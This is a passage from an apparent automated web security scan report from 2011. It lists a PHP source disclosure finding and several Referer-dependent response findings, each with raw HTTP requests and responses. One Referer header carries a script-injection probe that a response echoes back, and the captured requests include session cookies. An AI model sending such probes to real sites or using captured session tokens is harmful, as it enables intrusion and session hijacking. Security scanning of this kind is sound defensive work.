Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 7]><![endif]-->
<!--[if lt IE 7]><![endif]-->
<html xmlns="http://
...[SNIP]...
<div id="sign-in">
<form method="post" action="http://circle.stylemepretty.com/wp-login.php">
<input type="submit" value="Log In" id="log-in" name="wp-submit" />
...[SNIP]...
<input type="text" name="log" id="sign-in-username" />
<input type="password" name="pwd" id="sign-in-password" />
<input type="submit" value="Go" id="sign-in-btn" />
...[SNIP]...

13. Source code disclosure

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<meta name="copyright" content="<?php echo AT_COPYRIGHT_TEXT ?>" />
...[SNIP]...

14. Referer-dependent response
There are 6 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kind of user-supplied data.



14.1. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net.57389.9231.302br.net
Path:   /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Request 1

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2667D6E67A1B439BD1357045C7EEE079; Path=/
Content-Type: text/html
Content-Length: 7169
Date: Sat, 29 Jan 2011 01:55:05 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};


// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) ============================ */


   var version = "v260 - after fire drill release";
   var debug = (adsafeVisParams.debug == "true");

   var logLevels = {
       INFO : 'info',
       LOG : 'log',
       DIR : 'dir'
   };
   
   var log = function(obj, level){
       if (typeof level == 'undefined') level = logLevels.INFO;
       if (debug && (typeof console != 'undefined') && (typeof console.info != 'undefined') && (typeof console.log != 'undefined') && (typeof console.dir != 'undefined')) {
           try {
               console[level](obj);                
           } catch (e) {
           }
       }
   };

   var logDetection = function(resultArr, testTypes) {
       if (debug && (typeof console != 'undefined') && (typeof console.info != 'undefined') && (typeof console.log != 'undefined') && (typeof console.dir != 'undefined')) {
           console.info('Server Parameters:');
           console.dir(adsafeVisParams);
           var str = 'Detection Results:\n\n';
           for (var i in resultArr) {
               var row = resultArr[i];
               str += row.key + ': ' + decodeURIComponent(row.val) + '\n';
           }
           console.info(str);
           str = 'key: \n';
           for (var prop in testTypes) {
               if (testTypes.hasOwnProperty(prop)) {
                   str += prop + ': ' + testTypes[prop] + '\n';
               }
           }
           console.log(str);
       }
   };
   
   log(version + ', mode: ' + adsafeVisParams.mode);


   /* ============================ DETECTION ============================ */


   /*
    * note: this is just here for reference
    */
   var testTypes = {
       a : 'top.locati
...[SNIP]...

Request 2

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=75DDBEB9BA368438C43D431B363642FD; Path=/
Content-Type: text/html
Content-Length: 7025
Date: Sat, 29 Jan 2011 01:55:05 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};


// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) ============================ */


   var version = "v260 - after fire drill release";
   var debug = (adsafeVisParams.debug == "true");

   var logLevels = {
       INFO : 'info',
       LOG : 'log',
       DIR : 'dir'
   };
   
   var log = function(obj, level){
       if (typeof level == 'undefined') level = logLevels.INFO;
       if (debug && (typeof console != 'undefined') && (typeof console.info != 'undefined') && (typeof console.log != 'undefined') && (typeof console.dir != 'undefined')) {
           try {
               console[level](obj);                
           } catch (e) {
           }
       }
   };

   var logDetection = function(resultArr, testTypes) {
       if (debug && (typeof console != 'undefined') && (typeof console.info != 'undefined') && (typeof console.log != 'undefined') && (typeof console.dir != 'undefined')) {
           console.info('Server Parameters:');
           console.dir(adsafeVisParams);
           var str = 'Detection Results:\n\n';
           for (var i in resultArr) {
               var row = resultArr[i];
               str += row.key + ': ' + decodeURIComponent(row.val) + '\n';
           }
           console.info(str);
           str = 'key: \n';
           for (var prop in testTypes) {
               if (testTypes.hasOwnProperty(prop)) {
                   str += prop + ': ' + testTypes[prop] + '\n';
               }
           }
           console.log(str);
       }
   };
   
   log(version + ', mode: ' + adsafeVisParams.mode);


   /* ============================ DETECTION ============================ */


   /*
    * note: this is just here for reference
    */
   var testTypes = {
       a : 'top.location.href',
       b : 'parent.location.href',
       c : 'parent.document.referrer',
       d : 'window.location.href',
       e : 'window.document.referrer',
       f :
...[SNIP]...

14.2. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Request 1

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response 1

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=78176531?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=78176531?">\n');
document.write ('</SCRIPT>\n');
document.write ('<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=78176531?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=78176531?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>\n');
document.write ('</NOSCRIPT>\n');
document.write ('</IFRAME>\n');
document.write ('<SCRIPT TYPE="text/javascript" language="JavaScript">\n');
document.write ('var B3d=new Date();\n');
document.write ('var B3m=B3d.getTime();\n');
document.write ('B3d.setTime(B3m+30*24*60*60*1000);\n');
docum
...[SNIP]...

Request 2

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response 2

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1946456325/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1946456325?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1946456325/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1946456325?">\n');
document.write ('</SCRIPT>\n');
document.write ('<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1946456325/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1946456325?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1946456325?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>\n');
document.write ('</NOSCRIPT>\n');
document.write ('</IFRAME>\n');
document.write ('<SCRIPT TYPE="text/javascript" language="JavaScript">\n');
document.write ('var B3d=new Date();\n');
document.write ('var B3m=B3d.getTime();\n');
document.write ('B3d.setTime(B3m+30*24*60*60*100
...[SNIP]...

14.3. http://c.brightcove.com/services/viewer/federated_f9

Summary

Severity:   Information
Confidence:   Firm
Host:   http://c.brightcove.com
Path:   /services/viewer/federated_f9

Request 1

GET /services/viewer/federated_f9?&width=370&height=300&flashID=myExperience766783859001&bgcolor=%23FFFFFF&wmode=transparent&isVid=true&dynamicStreaming=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&%40videoPlayer=766783859001&autoStart= HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=766783859001&rand=408
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Mon, 17 Jan 2011 15:41:31 EST
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us1.24.04.08.2011-01-14072625/BrightcoveBootloader.swf?purl=http%3A%2F%2Fwww.bostonherald.com%2Fmediacenter%2Fvideo.php%3Fsrc%3Dhttp%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv%26program_id%3D4c6ebfbed6269%26media_id%3D2024%26title%3DSidewalk%2520snow%2520woes%26width%3D370%26height%3D300%26bc_id%3D766783859001%26rand%3D408&%40videoPlayer=766783859001&autoStart=&bgcolor=%23FFFFFF&dynamicStreaming=true&flashID=myExperience766783859001&height=300&isVid=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&width=370&wmode=transparent
Content-Length: 0
Date: Sat, 29 Jan 2011 01:57:35 GMT
Server:

Request 2

GET /services/viewer/federated_f9?&width=370&height=300&flashID=myExperience766783859001&bgcolor=%23FFFFFF&wmode=transparent&isVid=true&dynamicStreaming=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&%40videoPlayer=766783859001&autoStart= HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Mon, 17 Jan 2011 20:41:31 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us1.24.04.08.2011-01-14072625/BrightcoveBootloader.swf?%40videoPlayer=766783859001&autoStart=&bgcolor=%23FFFFFF&dynamicStreaming=true&flashID=myExperience766783859001&height=300&isVid=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&width=370&wmode=transparent
Content-Length: 0
Date: Sat, 29 Jan 2011 01:58:14 GMT
Server:

14.4. http://onset.freedom.com/fi/analytics/cms/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://onset.freedom.com
Path:   /fi/analytics/cms/

Request 1

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response 1

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:35 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:49:35 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28783

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
op42 + ':' + s.pageName;
s.prop44="17:45";
s.eVar6="";
s.hier1="entertainment|root";
s.hier2="events.cbs6albany.com|entertainment|events|events|root";
/** domain=events.cbs6albany.com **/

/** referer=http://events.cbs6albany.com/?376e5%22%3e%3cscript%3ealert(1)%3c/script%3ea7771aeaee3=1 **/
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)
//if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+ '-')

Request 2

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response 2

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:50 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:49:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28696

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
op42 + ':' + s.pageName;
s.prop44="17:45";
s.eVar6="";
s.hier1="entertainment|root";
s.hier2="events.cbs6albany.com|entertainment|events|events|root";
/** domain=events.cbs6albany.com **/

/** referer= **/
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)
//if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+ '-')

14.5. http://twitter.com/malsup

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup

Request 1

GET /malsup HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://malsup.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1295994766153789

Response 1

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:25:05 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224705-54401-50174
ETag: "369af92da7b575f3f9e1aeeb54e34e15"-gzip
Last-Modified: Fri, 28 Jan 2011 14:25:05 GMT
X-Runtime: 0.02191
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWNmZTFjMzZiNzFlNTc4YTNkZGVkNDQyNDg2ZTI1MTk2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8VoDzS0B--198beeb5bf2769390b9c3a6499e9bffa3abf42f0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 49593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">


<script type="text/javascript">
//<![CDATA[
(function(g){var a=location.href.split("#!")[1];if(a){window.location.hash = "";g.location.pathname = g.HBR = a.replace(/^([^/])/,"/$1");}})(window);
//]]>
</script>
<script type="text/javascript" charset="utf-8">
if (!twttr) {
var twttr = {}
}

// Benchmarking load time.
// twttr.timeTillReadyUnique = '1296182070-32644-55879';
// twttr.timeTillReadyStart = new Date().getTime();
</script>

<script type="text/javascript">
//<![CDATA[
var page={};var onCondition=function(D,C,A,B){D=D;A=A?Math.min(A,5):5;B=B||100;if(D()){C()}else{if(A>1){setTimeout(function(){onCondition(D,C,A-1,B)},B)}}};
//]]>
</script>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="en-us" http-equiv="Content-Language" />
<meta content="Mike Alsup (malsup) is on Twitter. Sign up for Twitter to follow Mike Alsup (malsup) and get their latest updates" name="description" />
<meta content="no" http-equiv="imagetoolbar" />
<meta content="width = 780" name="viewport" />
<meta content="4FTTxY4uvo0RZTMQqIyhh18HsepyJOctQ+XTOu1zsfE=" name="verify-v1" />
<meta content="1" name="page" />
<m
...[SNIP]...

Request 2

GET /malsup HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1295994766153789

Response 2

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:25:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224733-2476-56454
ETag: "369af92da7b575f3f9e1aeeb54e34e15"-gzip
Last-Modified: Fri, 28 Jan 2011 14:25:33 GMT
X-Runtime: 0.01441
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
